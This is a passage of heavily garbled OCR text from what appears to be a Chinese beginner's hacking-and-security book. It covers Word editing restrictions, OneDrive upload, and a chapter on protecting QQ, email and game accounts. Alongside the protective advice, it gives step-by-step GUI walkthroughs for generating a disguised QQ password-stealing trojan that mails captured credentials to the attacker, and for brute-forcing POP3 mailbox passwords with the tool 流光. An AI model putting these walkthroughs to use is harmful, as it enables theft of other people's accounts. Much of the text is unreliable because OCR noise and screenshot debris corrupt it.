行 哪些 类 型 的 更 改 ， 这 对 文档 具有 保护 作 
用 。 为 Word 文 档 添加 限制 编辑 的 具体 操作 
步骤 如 下 。 

[step 园 打开 需要 限制 编辑 的 Word 文 档 ， 选 
择 “ 文 件 ” 选 项 卡 ， 在 打开 的 列表 中 选择 
“信息 ”选项 ， 在 “信息 ”区 域 中 单 击 
“保护 文档 ”按钮 ， 在 弹出 的 下 拉 菜 单 中 
选择 “限制 编辑 ”选项 。 

保护 文档 


控制 尼 他 人 可 /时 此 六 村 所 这 拘 更 鸡 尖 
型 


湾 可 旦 否 旬 全 
FF 的 寺 名 


[sp 图 在 文档 的 右 侧 弹 出 “限制 编辑 ” 窗 
格 ， 勾 选 “ 仅 允许 在 文档 中 进行 此 类 型 的 编 
辑 ” 复 选 框 ， 单 击 “ 不 允许 任何 更 改 ( 只 
读 ) ”下 拉 列 表 框 右 侧 的 下 拉 按 钮 ， 在 弹出 
的 下 拉 列 表 中 选择 允许 修改 的 类 型 ， 这 里 选 
择 “ 不 允许 任何 更 改 《( 只 读 ) ”选项 。 

限制 编辑 竺 六 


达 . 妨 入 限 果 
村 仅 和 外 话 在 文档 中 洪 行 册 交 型 移 
绢 各 


step 图 单 去 “限制 编辑 ” 窗 格 中 的 “是 
动 强制 保护 ”按钮 。 
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[ep 国 弹出 “启动 强制 保护 ”对 话 框 ， 在 该 
对 话 框 中 选中 “密码 ” 单 选 按钮 ， 输 入 新 
密码 及 确认 新 密码 ， 单 击 “ 确 定 ” 按 钮 。 


aR Y % 


ORFsED 
(ET 有 者 可 以 DB 妆 坊 保 六 。 文 柱 术 加 记 闪 启 有 
“MRS, ) 


CJ w 

侈 提示 :如 果 选 中 “用 户 验证 ” 单 选 按 
钮 ， 已 验证 的 所 有 者 可 以 删除 文档 保护 。 
[sep 图 此 时 就 为 文档 添加 了 限制 编辑 。 当 
阅读 者 想 要 修改 文档 时 ， 在 文档 下 方 显示 
“由 于 所 选 内 容 已 被 锁定 ， 您 无 法 进行 此 
更 改 ” 字 样 。 


月 *“ 工 , 资 。 
招聘 人 数 ，| :人 
工作 地 上 。 


2000-3000 元 ” 


郑 相 市 x x 街 x x 大 厦 X 


step 较 如 果 用 户 想 要 取消 限制 编辑 ， 在 “ 限 
制 编辑 ” 窗 格 中 单 击 “ 停 止 保护 ”按钮 。 
限制 编辑 7 


以 上 
只 吉村 者 此 区 过 。 


ET 


SE 
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练习 2: 将 文档 上 传 至 OneDrive 

云端 OneDrive 是 由 微软 公司 推出 的 
一 项 云 存储 服务 ， 用 户 可 以 通过 自己 的 
Microsoft 账 户 进行 登录 ， 并 上 传 自己 的 图 
片 、 文 档 等 到 OneDrive 中 进行 存储 。 无 论 
身 在 何 处 ， 用 户 都 可 以 访问 OneDrive 上 的 
所 有 内 容 。 

用 户 可 以 直接 打开 “OneDrive ”窗口 
上 传 文档 ， 具 体 的 操作 步 又 如 下 。 
[step 图 在 “此 电脑 ”窗口 中 选择 OneDrive 选 
项 ， 或 者 在 任务 栏 的 OneDrive 图 标 上 单 击 饼 
标 右键 ， 在 弹出 的 快捷 菜单 中 选择 “打开 
你 的 OneDrive 文 件 夹 ”选项 ， 都 可 以 打开 
OneDrive 窗 口 。 


二 | 日 由 :Ioneprive 一 口 w 
EI =" :rr ss © 
€ ~ 个 硬 ，OneDrive v | 已 ”| 瘦 系 "OneDrive Pp 
才 快速 访问 名称 人 改期 

》 OneDrive 国文 二 /8 
时 此 电脑 
唤 网 后 
< > 
1 个 项 目 辆 加 


[step 图 选择 要 上 传 的 “重要 文件 .docx” 文 
件 ， 将 其 复制 并 粘贴 至 “文档 ”文件 夹 (或 
者 直接 拖 虽 文件 至 “文档 ”文件 夹 ) 中 。 


2018/3/18 149 


i 二 | >》 移动 到 文档 
艳 R 喇 
1 个 硕 目 = 国 
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[Sep 图 在 “文档 ”文件 夹 图 标 上 即 显示 刷新 
图 标 ， 表 明文 档 正在 同步 。 


全 1 上 回电 rive - oO x 


© 
Pp 
机 快速 访问 名 从 ~ 修改 日 期 
OneDit 志文 入 2018/8/18 15: 
国 kes 
车 
< 

1 个 项 目 ” 运 中 1 个 项 目 王国 


[seep 图 在 任务 栏 上 单 击 “上 载 中 心 ”图 标 ， 
在 打开 的 “上 载 中 心 ” 窗 口中 即 可 看 到 上 
传 的 文件 。 上 传 完 成 后 ， 即 可 使 用 上 传 的 
文档 。 


Doffice 


上 载 中 心 

a Moweh or 2F Le We ma 

六 SF 的 主打 > 将 用 攻关 志 RE a Br 
EE ER 


交 se ep/ on vere bYeeb/ ia] 43 TM 2 T5243 


第 10 便 


网 络 账号 及 密码 的 


防护 策略 


随 着 网 络 用 户 数 量 的 飞速 增长 ， 各 种 各 样 的 网 络 账号 密码 也 越 来 越 多 ， 账 号 密码 被 盗 
的 现象 也 屡见不鲜 。 本 章 介绍 网 络 账号 及 密码 的 防护 策略 ， 主 要 内 容 包 括 QQ 账 号 及 密码 
的 防护 策略 、 邮 箱 账号 及 密码 的 防护 策略 和 网 游 账号 及 密码 的 防护 策略 等 。 


10.1 QQ 账号 及 密码 的 防护 
策略 


通过 QQ 聊天 ， 广 大 网 民 打破 了 地 域 限 
制 ， 可 以 和 任何 地 方 的 朋友 进行 交流 ， 方 
便 了 工作 和 生活 ， 但 是 随 着 QQ 的 普及 ， 一 
些 盗 取 QQ 账号 与 密码 的 黑客 也 活跃 起 来 ， 
QQ 账号 与 密码 被 盗 的 现象 也 渐渐 多 起 来 。 


10.1.1 盗 取 QQ 密码 的 方法 


下 面 介绍 几 种 盗 取 QQ 密码 的 方法 。 

1. 通过 解除 密码 

解除 别人 的 QQ 密码 有 本 地 解除 和 远程 
解除 两 种 方法 。 本 地 解除 就 是 在 本 地 机 上 
解除 ， 不 需要 登录 上 网 ， 如 使 用 QQ 密码 终 
结 者 程序 ， 只 需 选择 好 QQ 号 码 的 目录 所 在 
路 径 后 ， 选 择 解除 条 件 〈 如 字母 、 数 字 型 
或 混合 型 ) ， 再 单 击 “开始 ”按钮 即 可 。 
远程 解除 密码 则 使 用 一 个 称 为 “QQ 机 器 
人 ”的 程序 ， 可 以 快速 在 线 解除 一 个 或 同 
时 解除 多 个 账号 的 密码 。 


2. 通过 木马 植 入 


木马 攻击 通常 是 通过 Web、 邮 件 等 方式 
给 用 户 发 送 木 马 的 服务 器 端 程序 ， 一 旦 用 
户 不 小 心 运行 了 ， 该 木马 程序 就 会 潜伏 在 
用 户 的 系统 中 ， 并 把 用 户 信 息 以 电子 邮件 


或 其 他 方式 发 送 给 攻击 者 ， 这 些 用 户 信息 
当然 也 包括 QQ。 


10.1.2 ”使 用 盗号 软件 盗 取 QQ 账号 与 
密码 
《QQ 简单 盗 》 是 一 款 经 典 的 盗号 软 
件 ， 采 用 插入 技术 ， 本 身 不 产生 进程 ， 因 此 
难以 被 发 现 。 它 会 自动 生成 一 个 木马 ， 只 要 
黑客 将 生成 的 木马 发 送 给 目标 用 户 ， 并 诱骗 
其 运行 该 木马 文件 ， 就 达到 了 入 侵 的 目的 。 
使 用 《QQ 简单 资 》 盗 取 密 码 的 具体 操 
作 步 又 如 下 。 
下 载 并 解压 “QQ 简单 盗 ” 文 件 夹 ， 
然后 双击 “QQ 简单 盗 .exe” 应 用 程序 ， 打 
开 “QQ 简 单 盗 ” 主 窗口 。 
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| 收 信 邮 箱 跟 发 信 闻 箱 尽量 不 要 使 用 同一 个 

[和 0 果 想 ; 马 发 结 其 地 人 .只 要 把 后 里 名 改 
Er 

lAsP 收 荡 不 会 用 的 留 宝 或 者 保留 原样 不 变 即 可 


系 
Ges 国 在 “ 收 信 邮 箱 ”“ 发 信 邮 箱 ”“ 发 
信箱 密码 ”等 文本 框 中 分 别 输入 邮箱 地 址 
和 密码 等 信息 ;在 “smtp 服 务 器 ”下 拉 列 
表 中 选择 一 种 邮箱 的 smtp 服 务 器 。 
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[1 | 


Wm to /ew sx. course 


景 新 砚 明 : 
[om 疝 单 证 一 是 新 名 亲 


必 人 邮箱 卫 发 邮 和 尽 型 下 要 使 用 同一 个 
上 续 其 他人 
| 


[er] es] 
step 图 设置 完毕 后 ， 单 击 “ 测 试 发 信 ” 按 
人 钮 ， 打 开 “ 请 查看 您 的 邮箱 是 否 收 到 测试 
信件 ”提示 框 。 


QQ 简单 和 国 辣 回 园 
请 认 看 您 的 邮箱 是 否 收 开 I 试 信件 


[Eee 图 单 去 OK 按钮 ， 然 后 在 IE 地 址 栏 中 输 
入 邮箱 的 网 址 ， 进 入 “邮箱 登录 ”页 面 
在 其 中 输入 设置 的 收 信 邮 箱 的 账户 和 密码 
后 ， 即 可 进入 该 邮箱 首页 。 

收 件 篇 ! 共 163 计 ， 其 直 来 壕 邮 御 181 计 主 旺 设 为 已 束 ) 

| 一 除 | | 尝 报 位 抠 邮 件 | 标记 为 ~ | 移动 到 ~ 。 查看 ~ 更 ~ 
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已 更 早 146 堵 ) 
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《05.10 唤 报 】 基 提成 交 超 A 及 总 量 空 … 


step 国 双击 接收 到 的 “测试 发 信 ” 邮 件 ， 
进入 该 邮件 的 相应 页 面 ， 如 收 到 这 样 的 
信息 ， 则 表明 “QQ 简单 盗 ” 发 消息 功能 
正常 。 
| <E 占 | 盏 重 | 3 >| 甘 发 | EE 罕 抠 过 二 邮件 
ek 


叶 间 : me (=) 
忆 件 人 ”4152. 


口 D 阐 单 盗 发 信 测 试 


侈 提示 :一 宇 “QQ 简 单 盗 ”截获 到 QQ 的 
账号 和 密码 ， 会 立即 将 内 容 发 送 到 指定 的 
邮箱 中 。 
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[ep 图 在 “QQ 简单 盗 ” 主 窗口 中 单 击 “ 选 
择 木 马 图 标 ” 按 钮 ， 打开“ 打开 ”对 话 
框 ， 根据 需要 选择 一 个 常见 的 不 易 被 人 怀 
疑 的 文件 作 图 标 。 


单 击 “ 打 开 ” 按 钮 ， 返 回 “QQ 简单 
盗 ” 主 窗口 ， 在 窗口 的 左下 方 即 可 看 到 木 
马 图 标 已 经 换 成 了 普通 图 片 。 
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[Ee 四 单 去 “生成 木马 ”按钮 ， 打 开 “ 另 存 
为 ”对 话 框 ， 在 其 中 设置 存放 木马 的 位 置 
和 名 称 。 


ieleleele 


[Ses 国 单 二 “保存” 按钮 ， 打 开 “ 提 示 ” 提 
示 框 ， 在 其 中 显示 生成 的 木马 文件 的 存放 
位 置 和 名 称 。 


提示 Lx 


[step 贺 单 去 “确定 ”按钮 ， 即 可 成 功 生成 木 
马 。 打 开 存 放 木 马 所 在 的 文件 夹 ， 即 可 看 
到 做 好 的 木马 程序 。 此 时 盗号 者 会 将 它 发 
送出 去 ， 坎 骗 QQ 用 户 去 运行 它 ， 即 可 完成 
植 入 木马 操作 。 


CD B08 (6) Mobie Port 
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10.1.3 ”提升 QQ 账号 的 安全 设置 


QQ 软件 提供 了 保护 用 户 隐私 和 安全 的 
功能 。 通 过 QQ 的 安全 设置 ， 可 以 很 好 地 保 
护 用 户 的 个 人 信息 和 账号 的 安全 。 
打开 QQ 主 界面 ， 单 击 “ 打 开 系 统 设 
置 ”按钮 ， 在 展开 的 菜单 中 选择 “设置 ” 
选项 。 


弹出 “系统 设置 ”对 话 框 ， 选 择 “ 安 
全 设置 ”选项 卡 ， 用 户 可 以 修改 密码 、 设 
置 QQ 锁 和 文件 传输 的 安全 级 别 等 。 
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图 选择 “QQ 锁 ” 选 项 ， 用 户 可 以 设置 
QQ 加 锁 功 能 。 
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[step 图 选择 “消息 记录 ”选项 ， 勾 选 “ 退 
出 QQ 时 自动 删除 所 有 消息 记录 ” 复 选 框 ， 
并 勾 选 “启用 消息 记录 加 密 ” 复 选 框 ， 
然后 输入 相关 口令 ， 还 可 以 设置 加 密 口令 国 
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选择 “安全 推荐 ”选项 ，QQ 建 议 
安装 QQ 浏览 器 ， 从 而 增强 访问 网 络 的 安 
全 性 。 
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[Bep 国 选择 “安全 更 新 ”选项 ， 用 户 可 以 
设置 安全 更 新 的 安装 方式 ， 一 般 选 中 “有 
安全 更 新 时 自动 为 我 安装 ， 无 须 提醒 〈 扒 
荐 ) ” 单 选 按钮。 


Es 0 A FIRSSE 


a 全 要 新 安全 所内 要 新 ， 可 达 加 SxgQQ 玫 用 安全， 
oow 天 
i 不 
二 CA 


step 园 选择 “文件 传输 ”选项 ， 在 其 中 可 以 
设置 文件 传输 的 安全 级 别 ， 一 般 采 用 推荐 
设置 即 可 。 

[| 


他 WrR8 网 sea 各 WR 


6 克 。 去 
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jl 《金山 密 保 》 是 针对 用 户 安全 上 网 时 
的 密码 保护 需求 而 开发 的 一 款 密码 保护 产 
品 。 使 用 《金山 密 保 》 可 有 效 保护 网 上 银 
行 账号 、 网 络 游戏 账号 和 QQ 账号 等 。 

使 用 《金山 密 保 》 保 护 QQ 号 码 的 具体 
操作 步骤 如 下 。 
[see 固 下 载 并 安装 《金山 密 保 》 软 件 ， 选 
择 “ 开 始 ” 一 “人 金山 密 保 ”菜单 项 ， 打 开 
“金山 密 保 ” 主 界面 ， 在 其 中 即 可 看 到 
“腾讯 QQ” 软 件 正 在 被 保护 ， 此 时 QQ 图 标 
右 下 方 会 出 现 一 个 黄色 的 叹 号 。 
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step 图 右 去 QQ 图 标 ， 在 弹出 的 快捷 菜单 中 
选择 “结束 ”选项 ， 即 可 停止 对 QQ 的 保 
护 ， 此 时 黄色 的 叹 号 就 会 消失 。 


step 图 如 果 选 择 “ 设 置 ” 选 项 ， 则 可 打开 
“添加 保护 ”对 话 框 ， 在 其 中 即 可 设置 程 
序 路 径 、 程 序 名 和 运行 参数 等 属性 。 


人 @ 提 示 : 如 果 选 择 “ 从 我 的 保护 中 移 除 ” 
选项 ， 即 可 将 QQ 程序 移出 保护 列表 。 如 果 
想 保护 其 他 程序 ， 需 在 “金山 密 保 ” 主 界 
面 中 单 击 “手动 添加 ”按钮 ， 在 打开 的 对 
话 框 进行 添加 。 


[Eee 四 在 “人 金山 密 保 ” 主 界面 中 单 击 “ 木 
马 速 杀 ” 按 钮 ， 打 开 “ 人 金山 密 保 盗号 木马 
专 杀 ” 对 话 框 ， 在 其 中 即 可 对 关键 位 置 、 
系统 启动 项 、 保 护 游戏 、 保 护 程序 等 进行 
扫描 。 

[ 峡 ) 全 山 密 保 盗号 森马 专 杀 


查 杀 进度 


关键 位 置 扫描 


系统 局 动 项 扫描 
保护 游戏 扫描 
保护 程序 扫描 


加 加 园区 


10.2 邮箱 账号 及 密码 的 防护 
策略 


随 着 计算 机 与 网 络 的 快速 普及 ， 电 子 
邮件 作为 便捷 的 传输 工具 ， 在 信息 交流 中 
发 挥 着 重要 的 作用 。 很 多 大 中 型 企业 和 个 
人 已 实现 了 无 纸 办 公 ， 所 有 的 信息 都 以 电子 
邮件 的 形式 传送 着 ， 其 中 包括 了 很 多 商业 信 
息 、 工 业 机密 和 个 人 隐私 。 因 此 ， 电 子 邮件 
的 安全 性 成 为 人 们 需要 重点 考虑 的 问题 。 


10.2.1 盗 取 邮箱 密码 的 常用 方法 

为 了 保护 电子 邮箱 ， 防 止 密码 被 黑客 
盗 取 ， 有 必要 了 解 黑 客 盗 取 邮 箱 密码 的 一 
些 常用 手段 。 


1. 各 个 击破 法 


现在 普通 用 户 可 以 选择 的 电子 邮箱 种 
类 很 多 ， 如 腾讯 、 网 易 、 搜 狐 、Hotmail 
等 。 这 些 网 站 的 邮箱 系统 本 身 都 有 很 好 的 
安全 保障 措施 。 而 网 易 和 腾讯 邮箱 在 保障 
邮箱 安全 方面 都 运用 了 SSL 技 术 ， 因 此 黑客 
如 果 要 破解 邮箱 密码 ， 必 须要 先 研 究 SSL 技 
术 ， 才 能 进行 突破 。 

黑客 破解 这 种 邮箱 的 关键 是 在 加 密 的 
数据 包 上 “ 切 开 ”一 个 切口 ， 然 后 利用 数 
据 交 换 的 方式 将 编译 好 的 数据 源 嵌入 到 加 
密 的 数据 源 上 ， 再 利用 编译 的 数据 结合 
破解 邮箱 密码 的 账号 ， 编 译 的 程序 会 以 自 定 
的 最 小 与 最 大 密码 长 度 的 数字 、 字 母 、 符 号 
组 成 字符 串 找到 正确 的 邮箱 密码 。 但 是 由 于 
各 种 邮箱 的 加 密 技术 不 同 ， 要 具体 到 每 款 邮 
箱 来 分 析 ， 从 而 实现 各 个 击破 的 目的 。 


2. TCP/IP 协 议 法 


协议 TCP/IP 的 主要 作用 是 在 主机 上 建 
立 一 个 虚拟 连接 ， 以 实现 高 可 靠 性 的 数据 
包 交 换 。 其 中 协议 人 可 以 进行 JP 数据 包 的 分 
割 和 组 装 ， 而 协议 TCP 则 负责 数据 到 达 目 标 
后 返回 来 的 确认 。 
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根据 协议 TCP/IP 的 工作 原理 ， 黑 客 可 
以 通过 目标 计算 机 的 端口 或 系统 漏洞 潜入 
到 对 方 后 ， 并 运行 程序 ARP。 然 后 阻 断 对 
方 的 TCP 反 馈 确认 ， 目 标 计 算 机 会 重 发 数据 
包 ， 此 时 ARP 将 接收 这 个 数据 包 并 分 析出 
其 中 的 信息 。 


3. 邮箱 破解 工具 法 

上 面 的 两 种 方法 涉及 的 技术 较 高 ， 
操作 过 程 也 比较 复杂 ，“ 菜 鸟 ” 级 别 的 黑 
客 一 般 并 不 选用 。 比 较 方便 简单 的 方法 是 
使 用 邮箱 破解 工具 ， 如 《 黑 雨 》《 朔 雪 》 
《流光 》 等 ， 这 些 软 件 具 有 安装 方便 快 
捷 、 程 序 简便 易 懂 、 界 面 清新 一 目 了 然 、 
使 用 方便 等 特点 。 


10.2.2 使 用 《流光 》 盗 取 邮 箱 密码 


《流光 》 是 一 款 FTP、POP3 解 密 工具 ， 
在 破解 密码 方面 具有 以 下 功能 。 
e 加 入 了 本 地 模式 ， 在 本 机 运行 时 不 
必 安 装 Sensor。 
e@ 用 于 检测 POP3/FTP 主 机 中 用 户 密码 
的 安全 漏洞 。 
e 高 效 服务 器 流 模式 ， 可 同时 对 多 台 
POP3/FTP 主 机 进行 检测 。 
e 支持 10 个 字典 同时 检测 ， 提 高 破解 
效率 。 
使 用 《流光 》 破 解密 码 的 具体 操作 步 
又 如 下 。 
[step 图 运行 《流光 》 软 件 ， 主 窗口 显示 如 下 
图 所 示 。 
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[step 图 勾 选 “POP3 主 机 ” 复 选 框 ， 选 择 
“编辑 ”一 “添加 ”一 “添加 主机 ” 菜 


[下 E377 7 ET 3 


于 黑客 攻防 与 电脑 安全 从 新 手 到 高 手 ( 微 视频 + 火力 升级 版 ) 


[ses 国 选择 “探测 ”一 “标准 模式 探测 ” 菜 
单项 (“简单 模式 探测 ”功能 不 用 指定 具 
体 的 字典 文件 ， 使 用 “流光 ”内 置 的 简单 


密码 ) 。 


国光 :095-2902 小 作品 白 友 所 有 
EF 主 


|EEE 喇 二 


[step 图 打开 “添加 主机 ”对 话 框 ， 在 文本 框 
输入 要 破解 的 POP3 服 务 器 地 址 ， 单 击 “ 确 
定 ” 按 钮 。 

添加 主机 

请 策 入 主机 名 或 P 均 址 ; 


rer woe com eral 
| 


口 na 中 We) | _ WAG | 


色 选 刚 添加 的 服务 器 地 址 前 的 复 选 
框 ， 选 择 “ 编 辑 ” 一 “添加 ”一 “添加 用 
户 ” 菜 单项 ， 弹 出 “添加 用 户 ” 对 话 框 ， 
在 文本 框 中 输入 要 破解 的 用 户 名 ， 单 击 
“确定 ”按钮 。 

添加 用 户 

请 输入 用 户 名 : 


[ew 


口 到 i 同 如 项 目 中 确定 (Q) | | REG ] 


[Eee 图 匀 选 “解码 字典 或 方案 ” 复 选 框 ， 选 
择 “ 编 辑 ” 一 “添加 ”一 “添加 字典 ” 菜 
单项 ， 弹 出 “打开 ”对 话 框 ， 选 择 要 添加 
的 字典 文件 ， 单 击 “ 打 开 ” 按 钮 。 

轩 5 


mo [fey 


N 
N 
目 ps 


Ny 


交 H 关 Bm 六 件 
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o x 
二 
PE 
[EE 
| ro 二 
| 
二 一 一) 本 人 


Ee 加 “流光 ”开始 进行 探测 ， 右 窗 格 中 显 
示 实时 探测 过 程 。 如 果 字 典 选 择 正确 ， 就 
会 破解 出 正确 的 密码 ， 如 下 图 所 示 。 


[EW TT 
至 本 EE 


wr Ci 


10.2.3 ”重要 邮箱 的 保护 措施 


重要 邮箱 是 用 户 用 于 存放 比较 重要 的 
邮件 和 信息 的 邮箱 ， 需 要 采取 一 些 措施 进 
行 保护 。 


1. 使 用 备用 邮箱 


建议 用 户 不 要 轻易 把 自己 的 重要 邮箱 
地 址 泄露 给 他 人 ， 但 在 某 些 网 站 或 BBS 上 ， 
需要 用 户 进行 邮箱 注册 才能 实现 浏览 和 发 
帖 等 功能 ;或 是 在 工作 中 需要 用 邮箱 进行 
交流 、 发 布 信息 等 ， 这 时 就 需要 我 们 使 用 
备用 邮箱 了 。 

用 户 可 以 申请 一 个 免费 邮箱 作为 备用 


邮箱 ， 可 以 利用 这 个 邮箱 订阅 新 闻 、 电 子 
杂志 ， 放 在 自己 的 个 人 主页 上 ， 在 自己 感 
兴趣 的 论坛 或 者 BBS 上 使 用 ， 或 是 用 于 代表 
公司 对 外 进行 业务 联系 。 

需要 注意 的 是 ， 如 果 是 利用 了 备用 邮 
箱 进 行 过 一 些 必 要 的 网 络 服务 申请 ， 应 该 把 
确认 信息 再 转发 到 自己 的 私人 邮箱 中 备用 。 


2. 保护 邮箱 密码 


除了 要 保护 好 重要 邮箱 的 地 址 以 外 ， 
邮箱 的 密码 也 是 需要 重点 保护 的 。 主 要 可 
以 采取 以 下 几 种 方式 来 防止 攻击 者 进行 暴 
力 破解 。 

。 密码 选择 。 密 码 至 少 要 有 8 位 ， 并 且 
至 少 要 包括 1 个 数字 、1 个 大 写字 母 和 
1 个 小 写字 母 ， 最 好 能 包括 1 个 符号 。 
这 种 字母 、 数 字 和 符号 组 成 的 密码 ， 
对 于 暴力 破解 软件 来 说 ， 是 比较 不 易 
被 破解 的 。 另 外 ， 密 码 最 好 不 要 包括 
用 户 的 名 字 缩 写 、 生 日 、 手 机 号 、 公 
司 电话 等 公开 信息 。 

。 定期 更 改 密码 。 要 养 成 定期 更 改 密 
码 的 习惯 ,最 好 每 一 个 月 更 改 一 次 
密码 ， 这 样 会 大 大 增加 破解 密码 的 
难度 。 

启用 邮箱 密码 保护 功能 。 通 过 设置 密码 

保护 ， 可 以 在 忘记 密码 时 通过 回答 密码 提示 
问题 或 发 送 短信 验证 的 方式 取 回 密码 。 


10.2.4” 找 回 被 次 的 邮箱 密码 


如 果 邮 箱 密码 已 经 被 黑客 窃取 甚至 算 
改 ， 此 时 用 户 应 该 尽快 将 密码 找 回 并 修改 
密码 以 避免 重要 的 资料 丢失 。 目 前 ， 绝 大 
部 分 的 邮箱 都 提供 恢复 密码 功能 ， 用 户 可 
以 使 用 该 功能 找 回 邮箱 密码 ， 以 便 邮箱 服 
务 的 继续 使 用 。 

下 面 介 绍 找 回 163 邮 箱 密 码 的 具体 操作 
步骤 。 

[step 回 在 IE 浏览 器 中 打开 163 邮 箱 的 登录 页 
面 (http://mail.163.com) 。 


第 10 章 ”网 络 账号 及 密码 的 防护 策略 


国 


人 芝 录 163 网 号 免 费 邮 

FS qm @183.c0m 
Sr 

En ze 


版 本 Em 


口琴 9 者 和 也 问 SsL 安 主 基 杂 
要 录 ] 注册 


step 图 单 击 “ 忘 记 密 码 了 ” 超 链 接 ， 打 开 
“网 易 通 行 证 ”窗口 ， 在 其 中 即 可 看 到 各 
种 修复 密码 的 方法 。 


ED I DT EE TT wj 
Sh 


你 各 通过 蝎 员 提示 问题 【更 & 放 al] 
全 中。 迄 过 保 禄 邮箱 【下 58】 


A oosn rez) 


- 轩 i [ER 


[step 图 单 去 “通过 密码 提示 问题 ” 超 链 接 ， 
打开 “输入 密码 问题 ”窗口 。 
找 回 酌 码 -> 通过 生日 和 密码 提示 问题 : 
通行 让 用 户 和 名， 有 一 500 163 com 
出 生日 期 ,|1999 “车 |m 同日 | 国 同 日 


ESGLES 


在 其 中 输入 申请 邮箱 时 设置 的 问题 的 
答案 后 ， 单 击 “ 下 一 步 ” 按 钮 ， 打 开 “ 重 
新 设置 密码 ”窗口 。 
找 回 密码 一 通过 牛 日 和 窗 码 提示 问题 : 

请 四 知 避 题 : 失 是 谁 

等 下 : 


新 安 名 ow 


Ei 


输入 右 轿 中 的 文字 :Dw | Sry ba 


[| 


[ep 图 在 输入 新 密码 和 验证 码 后 ， 单 击 
“下 一 步 ” 按 钮 ， 即 可 看 到 “您 已 成 功 设 
置 您 的 网 易 通行 证 密码 ”提示 框 ， 单 击 
“登录 ” 超 链 接 ， 即 可 直接 登录 自己 的 
邮箱 。 
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提示 信息 


共 豆 您， 畦 你 已 成 功 设 症 您 的 网 易 通行 证 密码 ! 
我 要 -> 登录 


a 10.2.5 ”通过 邮箱 设置 防止 垃圾 邮件 


L 在 电子 邮箱 的 使 用 过 程 中 ， 遇 到 垃圾 
邮件 是 很 平常 的 事 ， 那 么 如 何 处 理 这 些 垃 
圾 邮件 呢 ? 用 户 可 以 通过 邮箱 设置 防止 垃圾 
邮件 。 这 里 以 在 QQ 邮箱 中 设置 防止 垃圾 邮 
件 为 例 ， 讲 解 通过 邮箱 设置 防止 垃圾 邮件 的 
方法 ， 具 体 的 操作 步骤 如 下 。 

[step 园 在 QQ 邮箱 工作 界面 中 单 击 “ 设 置 ” 
超 链接 ， 进 入 “邮箱 设置 ”界面 。 


在 “邮箱 设置 ”界面 中 单 击 “ 反 垃 
圾 ”选项 ， 即 可 进入 “ 反 垃 圾 ”设置 界面 。 


mm wr em en 2 a em 
需 名 单 
设置 地 件 地 址 黑 名 单 
各 曙 作 下 项 记 到 基 人 的 好 件 ,你 可 以 把 从 的 邮件 近 关 训 入 呈 生 会 音 ，) 
设置 域名 黑 名 单 


(后 : 在 斌 们 旺 和 间 村 "exarple com 


step 图 单 击 “设置 邮件 地 址 黑 名 单 ” 链 接 ， 
进入 “设置 邮件 地 址 黑 名 单 ” 界 面 ， 在 其 
中 输入 邮箱 地 址 。 


nell neh 


设置 邮件 也 直 黑 名 单 | EDIR 三 


oq.coml * [DR 隐 S 单 | 7 要 这 
He 到 FF 
有 人 RS 


Step 加 单 去 “添加 到 黑 名 单 ” 按 钮 ， 即 可 将 
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黑客 攻防 与 电脑 安全 从 新 手 到 高 手 〈 微 视频 + 火力 升级 版 ) 


该 邮箱 地 址 添加 到 黑 名 单列 表 中 。 


[SG 图 单 直 “返回 “ 反 垃 圾 ， 设 置 ” 超 链 

接 ， 进 入 “ 反 垃 圾 ”界面 ， 在 “ 反 垃 圾 先 

项 ”界面 中 选中 “拒绝 ” 单 选 按钮 。 
[RE 珊 


口 接收 (临时 存放 在 过 圾 箱 中 ) 
回 拒 雹 (直接 开除 , 不 放 入 垃圾 征 ) 


垃 级 邮件 处 理 : 


[See 国 在 “邮件 过 小 提示” 界面 中 选中 “ 启 
用 ” 单 选 按钮 ， 这 样 当 有 发 给 用 户 的 邮件 


被 过 滤 时 会 给 出 相应 的 提示 。 
| 邮件 过 滤 提 示 
口 关闭 (7 任何 涅 示 ) 


图 局 用 (有 发 治 我 的 郎 件 祝 过 涉 时 提示 ) 
| 


[step 国 设置 完毕 后 ， 单 击 “ 保 存 更 改 ” 
钮 ， 即 可 保存 修改 。 


按 


ent.com”, 来 委 该 
观 则 影响 ， 确保 你 收 


ON (PERA) 
图 局 用 (有 发 从 折扣 地 件 六 过 汉 9 担 示 ) 


10.3 ”网 游 账 号 及 密码 的 防护 
策略 
如 今 网 络 游戏 可 谓 是 风靡 一 时 ， 而 


大 多 数 网 络 游戏 玩家 都 在 公共 网 吧 中 玩 ， 
这 就 给 一 些 不 法 分 子 以 可 乘 之 机 ， 即 只 要 
能 够 突破 网 吧 管 理 软件 的 限制 ， 就 可 以 使 
用 盗号 木马 来 轻松 盗 取 大 量 的 网 络 游戏 账 
号 。 本 节 介 绍 一 些 常 见 网 络 游戏 账号 的 盗 
取 及 防范 方法 ， 以 便于 玩家 能 切实 保护 好 
自己 的 账号 和 密码 。 


10.3.1 使 用 盗号 木马 盗 取 账号 的 防护 


在 一 些 公共 的 上 网 场所 〈 如 网 吧 ) ， 
使 用 木马 盗 取 网 络 游戏 玩家 的 账号 、 密 码 
是 比较 常见 的 。 如 常见 的 一 种 情况 就 是 : 
一 些 不 法 分 子 将 盗号 木马 故意 放 在 网 吧 计 
算 机 中 ， 等 其 他 人 在 这 台 计 算 机 上 玩 网 络 
游戏 的 时 候 ， 种 植 的 木马 程序 就 会 偷偷 地 
把 账号 和 密码 记录 下 来 ， 并 保存 在 隐蔽 的 
文件 中 或 直接 根据 实际 设置 发 送 到 黑客 指 
定 的 邮箱 中 。 

针对 这 些 情 况 ， 用 户 可 以 在 事先 登录 
网 游 账号 前 ， 使 用 《瑞星 》《 人 金山 毒霸 》 
等 杀毒 软件 手工 扫描 各 个 存储 空间 ， 以 查 
杀 这 些 木 马 。 下 面 以 使 用 《金山 毒霸 》 中 
的 顽固 病毒 木马 专 杀 工 具 为 例 ， 讲 解 查 杀 
盗号 病毒 木马 的 具体 操作 步骤 。 

[step 园 双击 桌面 上 的 “人 金山 毒霸 ”快捷 图 
标 ， 打 开 人 金山 毒 霸 工 作 界面 。 


[Bg 单 去 “百宝箱 ”图 标 ， 打 开 “ 全 山 毒 
霸 ” 的 百宝箱 工作 界面 。 

Bn 国 单 去 “电脑 安全 ”区 域 中 的 “ 堪 固 
木马 专 杀 ”图 标 ， 打 开 “ 顽 固 病 毒 未 马 专 
杀 ” 对 话 杠 。 
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ET 区 下 5 
i EY es 二 人 生 A ms 
> mrss | tacn | 
9 和 
as 天王 大 人 和 于 理 PY see 
Bh se Seo > Pe 
© 
He 画 = 也 朋 加 到 请 定 义 
eh PE 
w 
sor 电 且 安全 
图 * Rss 。 因 旦 mks 六 所 
a a 


Fee, 
